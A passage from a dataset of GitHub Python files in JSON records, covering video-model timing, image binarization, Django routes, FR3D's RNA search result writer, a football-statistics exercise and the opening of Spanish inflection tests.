vrsto/getDiagonals.py","file_name":"getDiagonals.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"23429995349","text":"from BREM.common.module import I3D_BackBone\nimport torch\nimport numpy as np\n\n\ndef test_inference(repeats=3, clip_frames=256):\n    model = I3D_BackBone(in_channels=3)\n    model.eval()\n    model.cuda()\n    import time\n\n    '''\n    1. The input video is 25.6 s long at 30 fps, i.e. 768 frames in total\n    2. Sampling at 10 fps, 256 frames are fed to the model\n    '''\n    video_time = 25.6\n    fps = 30\n    input_fps = 10\n    num_frame = video_time * fps\n    clip_frames = int(input_fps * video_time)\n    \n    run_times = []\n    x = torch.randn([1, 3, clip_frames, 96, 96]).cuda()\n    warmup_times = 2\n    for i in range(repeats + warmup_times):\n        torch.cuda.synchronize()\n        start = time.time()\n        with torch.no_grad():\n            y = model(x)\n        torch.cuda.synchronize()\n        run_times.append(time.time() - start)\n\n    infer_time = np.mean(run_times[warmup_times:])\n    infer_fps = num_frame * (1.0 / infer_time)\n    print(\"inference time (ms):\", infer_time * 1000)\n    print(\"infer_fps:\", int(infer_fps))\n    # print(y['loc'].size(), y['conf'].size(), y['priors'].size())\n\n\nif __name__ == \"__main__\":\n\n    # python BREM/common/I3D_speed.py configs/thumos14.yaml\n    test_inference(120, 256)\n","repo_name":"Junshan233/BREM","sub_path":"BREM/common/I3D_speed.py","file_name":"I3D_speed.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"71523680164","text":"\n\nfrom io import BytesIO\nimport cv2\nfrom fastapi import APIRouter\nimport numpy as np\nfrom PIL import Image\nfrom skimage.filters import threshold_otsu, threshold_niblack, threshold_sauvola\nfrom skimage import img_as_ubyte\n\n\n\ndef apply_contrast_stretching(image, min_in, max_in, min_out, max_out):\n    # Convert PIL Image to numpy array\n    image_array = np.array(image)\n\n    # Normalize pixel intensities within the desired input range\n    normalized_image = np.clip(image_array, min_in, max_in)\n    normalized_image = (normalized_image - min_in) * (max_out - min_out) / (max_in - min_in) + min_out\n\n    # Convert processed image back to PIL Image\n    stretched_image = Image.fromarray(normalized_image.astype(np.uint8))\n    stretched_image.save(\"stretched_image.jpg\")\n    return np.array(stretched_image)\n\ndef normalize_image(img):\n    # Skew correction\n    coords = np.column_stack(np.where(img > 0))\n    angle = cv2.minAreaRect(coords)[-1]\n    if angle < -45:\n        angle = -(90 + angle)\n    else:\n        angle = -angle\n    (h, w) = img.shape[:2]\n    center = (w // 2, h // 2)\n    M = cv2.getRotationMatrix2D(center, angle, 1.0)\n    img = cv2.warpAffine(img, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n    \n    # convert to png file format of the image in binary form \n    png = Image.fromarray(img)\n    png.save(\"normalize\"+''+\".png\")\n    # return the png file format of the image in binary form\n    return np.array(png)\n\ndef preprocess_image(img,greyMethod='average',noiseMethod='gaussian'):\n    # Convert to grayscale\n    if(greyMethod =='average') :img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    elif (greyMethod == 'luminosity'):img = cv2.cvtColor(img, cv2.COLOR_BGR2LUV)[:, :, 0]\n    elif (greyMethod == 'desaturation'):img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)[:, :, 2]\n    img = cv2.bitwise_not(img)\n    img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n    # Noise removal\n    if noiseMethod == 'gaussian':\n        img = cv2.GaussianBlur(img, (5, 5), 0)\n    elif 
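# --- Illustrative sketch (not part of the source): test_inference above
# brackets every forward pass with torch.cuda.synchronize() and discards the
# warm-up iterations, because CUDA kernels launch asynchronously and the first
# passes pay one-off costs (allocator, cuDNN autotune). A generic version of
# that timing loop; the Linear model is a stand-in:
import time
import numpy as np
import torch

def time_inference(model, x, repeats=10, warmup=2):
    times = []
    with torch.no_grad():
        for _ in range(warmup + repeats):
            if torch.cuda.is_available():
                torch.cuda.synchronize()  # drain previously queued kernels
            start = time.time()
            model(x)
            if torch.cuda.is_available():
                torch.cuda.synchronize()  # wait until this pass really finishes
            times.append(time.time() - start)
    return float(np.mean(times[warmup:]))  # warm-up runs are excluded

model, x = torch.nn.Linear(64, 64), torch.randn(8, 64)
print('mean forward time: %.6f s' % time_inference(model, x))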
noiseMethod == 'median':\n img = cv2.medianBlur(img, 5)\n elif noiseMethod == 'bilateral':\n img = cv2.bilateralFilter(img, 9, 75, 75)\n\n # convert to png file format of the image in binary form \n png = Image.fromarray(img)\n png.save(\"preprocess-\"+greyMethod+'-'+noiseMethod+\".png\")\n # return the png file format of the image in binary form\n return np.array(png)\n\ndef binarize_image(img,k,window_size, method:str='otsu',name:str = 'binary'):\n \"\"\"\n Binarize an image using OpenCV.\n Args:\n img: The image to binarize.\n method: The binarization method to use. Can be 'otsu', 'niblack', or 'sauvola'.\n k: The k value for niblack binarization.\n window_size: The window size for niblack and sauvola binarization.\n \n Returns:\n The binarized image.\n \"\"\"\n\n # Binarization\n if method == 'otsu':\n thresh = threshold_otsu(img)\n elif method == 'niblack':\n thresh = threshold_niblack(img, window_size=window_size, k=k)\n elif method == 'sauvola':\n thresh = threshold_sauvola(img, window_size=window_size)\n else:\n return None\n binary = img_as_ubyte(img > thresh)\n print('image binarized with '+method+' method successfully'+str(binary.shape))\n # convert to png file format of the image in binary form \n png = Image.fromarray(binary)\n # png.save(name+\".png\")\n \n # return the png file format of the image in binary form\n return np.array(png) \n\n\nasync def read_image(file) -> np.ndarray:\n \"\"\"\n Reads an image from an UploadFile object and returns it as a numpy array.\n \"\"\"\n contents = await file.read()\n img = cv2.imdecode(np.frombuffer(contents, np.uint8), cv2.IMREAD_COLOR)\n return img\n\n\nasync def save_image(image: np.ndarray,name:str='output') :# UploadFile:\n \"\"\"\n Saves an image as an UploadFile object and returns it.\n \"\"\"\n pil_img = Image.fromarray(image)\n with BytesIO() as output:\n pil_img.save(output, format=\"PNG\")\n # save_path = os.path.join(\"http://localhost:3000/\", name + \".png\")\n # pil_img.save(name+'.png',format=\"PNG\")\n contents = output.getvalue()\n # return StreamingResponse(output, media_type=\"image/png\")\n return contents\n ","repo_name":"MoussaRiad/Hispoter-API","sub_path":"services/imageService.py","file_name":"imageService.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25795952751","text":"from django.urls import path\n\nfrom . 
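# --- Illustrative sketch (not part of the source): binarize_image above picks
# either a single global threshold (Otsu) or a per-pixel local one (Niblack/
# Sauvola, computed over a sliding window). Local thresholds tolerate uneven
# illumination, which is why Sauvola is a common choice for document scans.
# Self-contained comparison on a synthetic image with a brightness gradient:
import numpy as np
from skimage.filters import threshold_otsu, threshold_sauvola

img = np.linspace(0.0, 1.0, 64 * 64).reshape(64, 64)  # uneven "lighting"
img[16:48, 16:48] += 0.2                              # a brighter "glyph"

global_mask = img > threshold_otsu(img)                    # one scalar
local_mask = img > threshold_sauvola(img, window_size=15)  # per-pixel array

print(global_mask.mean(), local_mask.mean())  # fraction of foreground pixels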
import views\n\nurlpatterns = [\n path('search/', views.search, name=\"index\"),\n path('category/', views.category, name=\"category\"),\n path('watch/', views.watch, name=\"watch\"),\n path('genre/', views.genre, name=\"genre\"),\n path('recent/', views.recent, name=\"recent\")\n]","repo_name":"aldotoci/django_api","sub_path":"test_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1376479668","text":"# write the list of candidate ids and all against all discrepancies to an .html file\n\nimport numpy as np\nimport os\nfrom collections import defaultdict\nfrom fr3d_configuration import SERVER\nfrom fr3d_configuration import OUTPUTPATH\nfrom fr3d_configuration import TEMPLATEPATH\nfrom fr3d_configuration import JS1\nfrom fr3d_configuration import JS2\nfrom fr3d_configuration import JS3\nfrom fr3d_configuration import JS4\nfrom fr3d_configuration import JS5\nfrom fr3d_configuration import REFRESHTIME\n\ndef getCSVfilename(Q):\n if SERVER:\n csvfilename = Q['queryID'] + \"/\" + Q['queryID'] + \".csv\"\n csvlink = Q['queryID'] + \".csv\"\n else:\n csvfilename = \"%s.csv\" % Q['name'].encode('ascii', 'ignore')\n csvfilename = \"%s.csv\" % Q['name']\n csvfilename = csvfilename.replace(\" \",\"_\")\n csvlink = csvfilename\n\n return(csvfilename, csvlink)\n\ndef format_resolution(data):\n\n r = data['resolution']\n try:\n s = \"%0.2f\" % r\n # remove trailing 0\n if s[-1] == \"0\":\n s = s[0:(len(s)-1)]\n except:\n if 'NMR' in data['method']:\n s = \"NMR\"\n else:\n s = \"NA\"\n return s\n\ndef writeHTMLOutput(Q,candidates,allvsallmatrix=np.empty( shape=(0, 0) )):\n \"\"\" Write the list of candidates in an HTML format that also shows\n the coordinate window and a heat map of all-against-all distances.\n \"\"\"\n\n pairTypes = ['glycosidicBondOrientation','chiDegree','pairsStacks','coplanar','BPh','BR','sO','crossingNumber']\n pairsToPrint = defaultdict(list)\n\n # record which of the many possible pairwise interaction columns contain data\n for pairType in pairTypes:\n for candidate in candidates:\n interactions = candidate[\"interactions\"]\n for a in range(0,len(candidate['indices'])): # first position\n for b in range(0,len(candidate['indices'])): # second position\n if (a,b,pairType) in interactions:\n if not pairType == 'crossingNumber':\n pairsToPrint[pairType].append((a,b))\n elif len(interactions[(a,b,pairType)]) > 0 \\\n and interactions[(a,b,pairType)][0] != '0' \\\n and interactions[(a,b,pairType)][0] != 'None':\n pairsToPrint[pairType].append((a,b))\n\n pagetitle = \"FR3D %s\" % Q['name'].encode('ascii','ignore')\n\n if SERVER:\n htmlfilename = Q['queryID'] + \"/\" + Q['queryID']\n else:\n htmlfilename = Q['name'].replace(\" \",\"_\").encode('ascii', 'ignore')\n htmlfilename = Q['name'].replace(\" \",\"_\")\n\n candidatelist = '\\n'\n\n numPositions = Q[\"numpositions\"]\n\n # write header line, with instructions about how to sort each column\n candidatelist += \"\"\n header_column = 2\n if Q[\"type\"] == \"geometric\" or Q[\"type\"] == \"mixed\":\n candidatelist += \"\"\n header_column = 3\n candidatelist += \"\" % header_column # or try Å\n header_column += 1\n for j in range(0,numPositions):\n candidatelist += \"\" % (header_column,j+1)\n header_column += 1\n candidatelist += \"\" % header_column\n header_column += 1\n sequence_column = header_column\n for pairType in pairTypes:\n for c in sorted(list(set(pairsToPrint[pairType]))):\n if c[0] < c[1] 
or (c[0] != c[1] and pairType in [\"BPh\",\"BR\",\"sO\"]) or (c[0]==c[1] and pairType in [\"glycosidicBondOrientation\",\"chiDegree\"]):\n if c[0] == c[1] and pairType == 'glycosidicBondOrientation':\n candidatelist += \"\" % (header_column,c[0]+1)\n header_column += 1\n elif c[0] == c[1] and pairType == 'chiDegree':\n candidatelist += \"\" % (header_column,c[0]+1)\n header_column += 1\n elif pairType == 'crossingNumber':\n candidatelist += \"\" % (header_column,c[0]+1,c[1]+1)\n header_column += 1\n else:\n candidatelist += \"\\n\"\n\n # write one row for each candidate\n for i in range(0,len(candidates)):\n candidate = candidates[i]\n candidatelist += '\"\n\n PDB_id = candidate[\"unitids\"][0][0:4]\n if PDB_id in Q[\"PDB_data_file\"]:\n candidatelist += \"\" % format_resolution(Q[\"PDB_data_file\"][PDB_id])\n else:\n candidatelist += \"\"\n\n # write unit ids\n for j in range(0,numPositions):\n candidatelist += \"\"\n\n # write nucleotide sequence with helpful separator symbols\n sequence = \"\"\n for j in range(0,numPositions):\n fields = candidate[\"unitids\"][j].split(\"|\")\n sequence += fields[3]\n\n if len(fields) == 9: # symmetry operator present\n symm = fields[8]\n else:\n symm = \"\"\n\n if j+1 < numPositions:\n # if same chain and same symmetry operator, if present\n cfields = candidate[\"unitids\"][j+1].split(\"|\")\n if len(cfields) == 9: # symmetry operator present\n csymm = cfields[8]\n else:\n csymm = \"\"\n\n if fields[2] == cfields[2] and symm == csymm:\n if candidate['chainindices'][j] + 1 == candidate['chainindices'][j+1]: # successive\n sequence += \"-\"\n elif candidate['chainindices'][j] + 1 < candidate['chainindices'][j+1]: # later\n sequence += \"→\"\n else:\n sequence += \"←\"\n else:\n sequence += \".\"\n candidatelist += \"\"\n\n # write interactions by group\n interactions = candidate[\"interactions\"]\n for pairType in pairTypes:\n for c in sorted(list(set(pairsToPrint[pairType]))):\n if c[0] < c[1] or (c[0] != c[1] and pairType in [\"BPh\",\"BR\",\"sO\"]) or (c[0]==c[1] and pairType in [\"glycosidicBondOrientation\",\"chiDegree\"]):\n if (c[0],c[1],pairType) in interactions and len(interactions[(c[0],c[1],pairType)]) > 0 and interactions[(c[0],c[1],pairType)][0] != \"None\":\n # multiple interactions of the same type separated by commas\n candidatelist += \"\"\n else:\n candidatelist += \"\"\n\n candidatelist += '\\n'\n candidatelist += '
    S.ShowDiscrepancyRes. ÅPosition %dSequenceConf. %dChi %dCrossing %d--%d%d--%d\" % (header_column,c[0]+1,c[1]+1)\n header_column += 1\n candidatelist += \"
    '+str(i+1)+'.%sNA\"+candidate[\"unitids\"][j]+\"\"+sequence+\"\"+\",\".join(interactions[(c[0],c[1],pairType)])+\"
    \\n'\n\n discrepancydata = \"var data = []\\n\"\n\n if np.size(allvsallmatrix) > 0:\n # write discrepancy data in new 2022 list format\n # first element is a reference to the div in which the heatmap should appear\n discrepancydata = 'var data = [\"#heatmap\",[\\n' # start a list, start a matrix\n\n # second element is a matrix with the numerical values of the discrepancy\n # writing both upper and lower triangles of the matrix\n s = allvsallmatrix.shape[0]\n for c in range(0,s):\n discrepancydata += '[' # start a row of the discrepancy matrix\n ife1 = candidates[c][\"unitids\"][0]\n for d in range(0,s):\n ife2 = candidates[d][\"unitids\"][0]\n discrepancydata += \"%.4f\" % allvsallmatrix[c][d] # one entry\n if d < s-1:\n discrepancydata += ',' # commas between entries in a row\n else:\n discrepancydata += '],\\n' # end a row, newline\n\n discrepancydata += '],\\n' # end the matrix, continue the list\n\n # third element is a list of labels of instances\n discrepancydata += '[' # start list of instances\n for c in range(0,s):\n ife1 = candidates[c][\"unitids\"][0]\n discrepancydata += '\"' + ife1 + '\"' # write one instance name in quotes\n if c < s-1:\n discrepancydata += \",\" # commas between instances\n else:\n discrepancydata += \"]\\n]\" # end list of instances, end list of data\n\n # get the path of the current program\n current_path,current_program = os.path.split(os.path.abspath(__file__))\n\n filename = os.path.join(current_path,'template.html')\n\n # read template.html into one string\n with open(filename, 'r') as myfile:\n template = myfile.read()\n\n # replace ###PAGETITLE### with pagetitle\n template = template.replace(\"###PAGETITLE###\",pagetitle)\n template = template.replace(\"###sequencecolumn###\",str(sequence_column))\n\n if len(candidates) == 1:\n queryNote = \"Query name: %s. Found %d candidate from %d of %d files in %0.0f seconds.\" % (Q['name'].encode('ascii','ignore'),len(candidates),Q[\"numFilesSearched\"],len(Q[\"searchFiles\"]),Q[\"elapsedClockTime\"])\n queryNote = \"Query name: %s. Found %d candidate from %d of %d files in %0.0f seconds.\" % (Q['name'],len(candidates),Q[\"numFilesSearched\"],len(Q[\"searchFiles\"]),Q[\"elapsedClockTime\"])\n else:\n queryNote = \"Query name: %s. Found %d candidates from %d of %d files in %0.0f seconds.\" % (Q['name'].encode('ascii','ignore'),len(candidates),Q[\"numFilesSearched\"],len(Q[\"searchFiles\"]),Q[\"elapsedClockTime\"])\n queryNote = \"Query name: %s. Found %d candidates from %d of %d files in %0.0f seconds.\" % (Q['name'],len(candidates),Q[\"numFilesSearched\"],len(Q[\"searchFiles\"]),Q[\"elapsedClockTime\"])\n\n if len(Q[\"errorMessage\"]) > 0:\n queryNote += \"
    \\n\"\n queryNote += \"Error Message:
    \\n\"\n for line in Q[\"errorMessage\"]:\n queryNote += line + \"
    \\n\"\n if \"moreCandidatesThanHeatMap\" in Q:\n queryNote += \" \" + Q[\"moreCandidatesThanHeatMap\"] + \"\\n\"\n else:\n queryNote += \"\\n\"\n\n template = template.replace(\"###QUERYNAME###\",str(queryNote.encode('ascii','ignore')))\n\n if SERVER:\n seeModifyQuery = 'See and modify query ' % Q[\"queryID\"]\n else:\n seeModifyQuery = ''\n\n template = template.replace(\"###SEEMODIFYQUERY###\",seeModifyQuery)\n\n csvfilename,csvlink = getCSVfilename(Q)\n\n seeCSVOutput = 'See CSV output' % csvlink\n template = template.replace(\"###seeCSVOutput###\",seeCSVOutput)\n\n description = \"
    Columns of the table show candidate number in similarity order, checkbox to display coordinates or not, structure resolution, discrepancy from query in geometric or mixed searches, units matching each position in the query, sequence of the units and backbone connectivity, glycosidic bond conformation if requested, pair and stack interactions present, base-phosphate interactions, base-ribose interactions, oxygen stacking interactions, and the number of nested AU, GC, GU Watson-Crick pairs crossed by each annotated interaction.
    \"\n\n template = template.replace(\"###DESCRIPTION###\",description)\n\n # replace ###CANDIDATELIST### with candidatelist\n template = template.replace(\"###CANDIDATELIST###\",candidatelist)\n\n template = template.replace(\"###JS1###\",JS1)\n template = template.replace(\"###JS2###\",JS2)\n template = template.replace(\"###JS3###\",JS3)\n template = template.replace(\"###JS4###\",JS4)\n\n refresh = \"\"\n if \"reloadOutputPage\" in Q and Q[\"reloadOutputPage\"]:\n refresh = '' % REFRESHTIME\n template = template.replace(\"###REFRESH###\",refresh)\n\n if np.size(allvsallmatrix) > 0:\n template = template.replace(\"###JS5###\",JS5) # include heatmap.js code\n discrepancydata = ''\n template = template.replace(\"###DISCREPANCYDATA###\",discrepancydata)\n else:\n template = template.replace(\"###DISCREPANCYDATA###\",\"\")\n template = template.replace(\"###JS5###\",\"\") # do not display a heat map\n\n outputfilename = os.path.join(OUTPUTPATH,htmlfilename+\".html\")\n\n print(\"Writing to %s\" % outputfilename)\n\n messages = \"\"\n\n messages += \"\\n
    \"\n if len(Q[\"userMessage\"]) > 0:\n messages += \"User messages:
    \\n\"\n for line in Q[\"userMessage\"]:\n messages += line + \"
    \\n\"\n else:\n messages += \"No error or warning messages.
    \\n\"\n\n template = template.replace(\"###MESSAGES###\",messages)\n\n with open(outputfilename, 'w') as myfile:\n myfile.write(template)\n\n if SERVER:\n os.system(\"rm %s.gz\" % outputfilename)\n os.system(\"gzip %s\" % outputfilename)\n\n\n\ndef writeCSVOutput(Q,candidates):\n \"\"\"Write the list of candidates in comma separated value format\n \"\"\"\n\n pairTypes = ['glycosidicBondOrientation','chiDegree','pairsStacks','BPh','BR','sO','crossingNumber']\n pairsToPrint = defaultdict(list)\n\n # record which of the many possible columns contain data\n for pairType in pairTypes:\n for candidate in candidates:\n interactions = candidate[\"interactions\"]\n for a in range(0,len(candidate['indices'])): # first position\n for b in range(0,len(candidate['indices'])): # second position\n if (a,b,pairType) in interactions:\n pairsToPrint[pairType].append((a,b))\n\n pagetitle = \"FR3D %s\" % Q['name'].encode('ascii','ignore')\n\n candidatelist = ''\n\n numPositions = Q[\"numpositions\"]\n\n # write header line\n candidatelist += \"Similarity order,\"\n if(Q[\"type\"] == \"geometric\" or Q[\"type\"] == \"mixed\"):\n candidatelist += \"Discrepancy,\"\n candidatelist += \"Resolution,\"\n\n for j in range(0,numPositions):\n candidatelist += \"Position %d,\" % (j+1)\n candidatelist += \"Sequence,\" # list sequence of candidate\n for pairType in pairTypes:\n for c in sorted(list(set(pairsToPrint[pairType]))):\n if c[0] < c[1] or (c[0] != c[1] and pairType in [\"BPh\",\"BR\",\"sO\"]) or (c[0]==c[1] and pairType in [\"glycosidicBondOrientation\",\"chiDegree\"]):\n if c[0] == c[1] and pairType == 'glycosidicBondOrientation':\n candidatelist += \"Orient \"+str(c[0]+1)+\",\"\n elif c[0] == c[1] and pairType == 'chiDegree':\n candidatelist += \"Chi \"+str(c[0]+1)+\",\"\n elif pairType == 'crossingNumber':\n candidatelist += \"Cross \"+str(c[0]+1)+\"--\"+str(c[1]+1)+\",\"\n else:\n candidatelist += str(c[0]+1)+\"--\"+str(c[1]+1)+\",\"\n\n candidatelist += \"View,Coordinates,Sequence variability\" # link to view, link for coordinates\n\n candidatelist += \"\\n\"\n\n # write one row for each candidate\n for i in range(0,len(candidates)):\n candidate = candidates[i]\n candidatelist += str(i+1)+','\n if(Q[\"type\"] == \"geometric\" or Q[\"type\"] == \"mixed\"):\n candidatelist += \"%0.4f,\" % candidate[\"discrepancy\"]\n\n PDB_id = candidate[\"unitids\"][0][0:4]\n if PDB_id in Q[\"PDB_data_file\"]:\n candidatelist += format_resolution(Q[\"PDB_data_file\"][PDB_id]) + \",\"\n else:\n candidatelist += \"NA,\"\n\n # write unit ids\n for j in range(0,numPositions):\n candidatelist += candidate[\"unitids\"][j]+\",\"\n\n # write nucleotide sequence with helpful separator symbols\n sequence = \"\"\n for j in range(0,numPositions):\n fields = candidate[\"unitids\"][j].split(\"|\")\n sequence += fields[3]\n\n if len(fields) == 9: # symmetry operator present\n symm = fields[8]\n else:\n symm = \"\"\n\n if j+1 < numPositions:\n # if same chain and same symmetry operator, if present\n cfields = candidate[\"unitids\"][j+1].split(\"|\")\n if len(cfields) == 9: # symmetry operator present\n csymm = cfields[8]\n else:\n csymm = \"\"\n\n if fields[2] == cfields[2] and symm == csymm:\n if candidate['chainindices'][j] + 1 == candidate['chainindices'][j+1]: # successive\n sequence += \"--\"\n elif candidate['chainindices'][j] + 1 < candidate['chainindices'][j+1]: # later\n sequence += \"->\"\n else:\n sequence += \"<-\"\n else:\n sequence += \"..\"\n\n candidatelist += sequence + \",\"\n\n # write interactions by group\n 
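
The `writeCSVOutput` routine above builds each row by string concatenation and hand-wraps multi-valued interaction fields in double quotes. Below is a minimal sketch of the same row emission using Python's built-in `csv` module, which applies that quoting automatically; the candidate dicts and the column set here are illustrative, not FR3D's exact schema.

```python
# Sketch: emit candidate rows with csv.writer instead of manual concatenation.
# csv.writer quotes a field only when it contains the delimiter or quote char,
# so a comma-joined interaction list like "cWW,s35" round-trips cleanly.
import csv
import io

def candidates_to_csv(candidates):
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["Similarity order", "Resolution", "Sequence", "Interactions"])
    for i, cand in enumerate(candidates, start=1):
        writer.writerow([
            i,
            cand.get("resolution", "NA"),
            cand.get("sequence", ""),
            ",".join(cand.get("interactions", [])),  # quoted for us if needed
        ])
    return buf.getvalue()

print(candidates_to_csv([
    {"resolution": "2.5", "sequence": "G-C", "interactions": ["cWW", "s35"]},
]))
```
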
interactions = candidate[\"interactions\"]\n for pairType in pairTypes:\n for c in sorted(list(set(pairsToPrint[pairType]))):\n if c[0] < c[1] or (c[0] != c[1] and pairType in [\"BPh\",\"BR\",\"sO\"]) or (c[0]==c[1] and pairType in [\"glycosidicBondOrientation\",\"chiDegree\"]):\n if (c[0],c[1],pairType) in interactions and len(interactions[(c[0],c[1],pairType)]) > 0 and interactions[(c[0],c[1],pairType)][0] != \"None\":\n # multiple interactions of the same type separated by commas\n candidatelist += '\"'+\",\".join(interactions[(c[0],c[1],pairType)])+'\",'\n else:\n candidatelist += \",\"\n\n # make list of unit ids\n unit_id_list = ''\n for j in range(0,numPositions):\n unit_id_list += candidate[\"unitids\"][j]\n if j < numPositions-1:\n unit_id_list += ','\n\n # make link to view\n candidatelist += '\"http://rna.bgsu.edu/rna3dhub/display3D/unitid/' + unit_id_list + '\",'\n\n # make link to coordinates\n candidatelist += '\"http://rna.bgsu.edu/rna3dhub/rest/getCoordinates?coord=' + unit_id_list + '\",'\n\n # make link to sequence variability server\n candidatelist += '\"http://rna.bgsu.edu/correspondence/variability?id=' + unit_id_list + '&format=unique\",'\n\n candidatelist += '\\n'\n\n csvfilename,csvlink = getCSVfilename(Q)\n\n outputfilename = os.path.join(OUTPUTPATH,csvfilename)\n\n if not 'server' in Q:\n print(\"Writing to %s\" % outputfilename)\n\n with open(outputfilename, 'w') as myfile:\n myfile.write(candidatelist)\n\n \"\"\"\n # Unfortunately, this doesn't work in practice, because the downloaded file is\n # unzipped but still has the .gz extension and does not have .csv.gz extension.\n # Don't know why. If you rename it from .gz to .csv, it's fine.\n if SERVER:\n os.system(\"rm %s\" % (OUTPUTPATH+csvfilename+'.gz'))\n os.system(\"gzip %s\" % (OUTPUTPATH+csvfilename))\n \"\"\"\n\ndef writeCandidateOutput(candidates, Q, ifedata):\n queryName = Q['name']\n fileName = '../output/' + queryName.encode('ascii','ignore') + '_python_output.txt'\n file = open(fileName, 'w')\n file.write(\"Found \" + str(len(candidates)) + \" candidates\\n\")\n\n\n\n for candidate in candidates:\n dataLine = \"\"\n\n indices = \"\"\n for index in candidate['indices']:\n indices += \"%6s\" % str(index)\n\n dataLine += indices\n\n file.write(dataLine + '\\n')\n file.close()\n\n\n","repo_name":"BGSU-RNA/fr3d-python","sub_path":"fr3d/search/write_output.py","file_name":"write_output.py","file_ext":"py","file_size_in_byte":20413,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"16274162436","text":"data = dict()\ngoals = list()\nalldata = list()\nwhile True:\n\n data.clear()\n data['Name'] = str(input(\"Player's name: \"))\n while True:\n try:\n data['Matches'] = int(input(f\"How many matches has {data['Name']} played ? \"))\n except ValueError as e:\n print(\"Type only integers numbers!\")\n else:\n break\n\n goals.clear()\n for x in range(0,data['Matches']):\n goals.append(int(input(f\"How many goals has {data['Name']} scored in the match {x+1} ? \")))\n data['Goals'] = goals[:]\n data['Total'] = sum(goals)\n data['AVG'] = (sum(goals)/data['Matches'])\n alldata.append(data.copy())\n\n while True:\n answer = str(input(\"Do you want to register anyone else ? 
(Y) = Yes, (N) = No : \")).upper()\n if answer not in 'YN':\n print(\"Please, type only 'Y' or 'N' \")\n else:\n break\n if answer == 'N':\n break\n\nprint(\"-\"*22)\nfor x in alldata:\n for k,v in x.items():\n print(f\"{k} = {v}\")\n print()\nprint(\"-\"*22)\n\nwhile True:\n search = int(input(\"Type the player's code that you want to research: (999 ens the research) \"))\n if search == 999:\n break\n if search >= len(alldata):\n print(\"Error! That code owns to no one\")\n else:\n print(f\"Player's data: {alldata[search]['Name']}\")\n for x,y in enumerate(alldata[search]['Goals']):\n print(f\"In the match {x+1} he scored {y} goals\")\n print(\"-\"*22)\n\n print(f\"The key {k} has the value: {v}\")\nprint(\"-\"*22)\n\nplayer = str(input(\"Type the player's name that you want to research: \"))\nfor x in alldata:\n if player in x['Name']:\n for k, v in x.items():\n print(f\"{k}, {v}\")\n","repo_name":"NikiReis/PythonExercises","sub_path":"World 3/Exercise 95.py","file_name":"Exercise 95.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"34099070662","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom builtins import str, bytes, dict, int\nfrom builtins import map, zip, filter\nfrom builtins import object, range\n\nimport os\nimport sys\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), \"..\"))\nimport unittest\nimport subprocess\n\nfrom pattern import es\n\nfrom io import open\n\ntry:\n PATH = os.path.dirname(os.path.realpath(__file__))\nexcept:\n PATH = \"\"\n\n#---------------------------------------------------------------------------------------------------\n\n\nclass TestInflection(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_pluralize(self):\n # Assert the accuracy of the pluralization algorithm.\n from pattern.db import Datasheet\n test = {}\n for w, lemma, tag, f in Datasheet.load(os.path.join(PATH, \"corpora\", \"wordforms-es-davies.csv\")):\n if tag == \"n\":\n test.setdefault(lemma, []).append(w)\n i, n = 0, 0\n for sg, pl in test.items():\n pl = sorted(pl, key=len, reverse=True)[0]\n if es.pluralize(sg) == pl:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.77)\n print(\"pattern.es.pluralize()\")\n\n def test_singularize(self):\n # Assert the accuracy of the singularization algorithm.\n from pattern.db import Datasheet\n test = {}\n for w, lemma, tag, f in Datasheet.load(os.path.join(PATH, \"corpora\", \"wordforms-es-davies.csv\")):\n if tag == \"n\":\n test.setdefault(lemma, []).append(w)\n i, n = 0, 0\n for sg, pl in test.items():\n pl = sorted(pl, key=len, reverse=True)[0]\n if es.singularize(pl) == sg:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.93)\n print(\"pattern.es.singularize()\")\n\n def test_attributive(self):\n # Assert \"alto\" => \"altos\" (masculine, plural), and others.\n for lemma, inflected, gender in (\n (\"alto\", \"alto\", es.MALE + es.SINGULAR),\n (\"alto\", \"altos\", es.MALE + es.PLURAL),\n (\"alto\", \"alta\", es.FEMALE + es.SINGULAR),\n (\"alto\", \"altas\", es.FEMALE + es.PLURAL),\n (\"verde\", \"verdes\", es.MALE + es.PLURAL),\n (\"verde\", \"verdes\", es.FEMALE + es.PLURAL)):\n v = es.attributive(lemma, gender)\n self.assertEqual(v, inflected)\n print(\"pattern.es.attributive()\")\n\n def test_predicative(self):\n # Assert the accuracy of the predicative algorithm (\"horribles\" => \"horrible\").\n from 
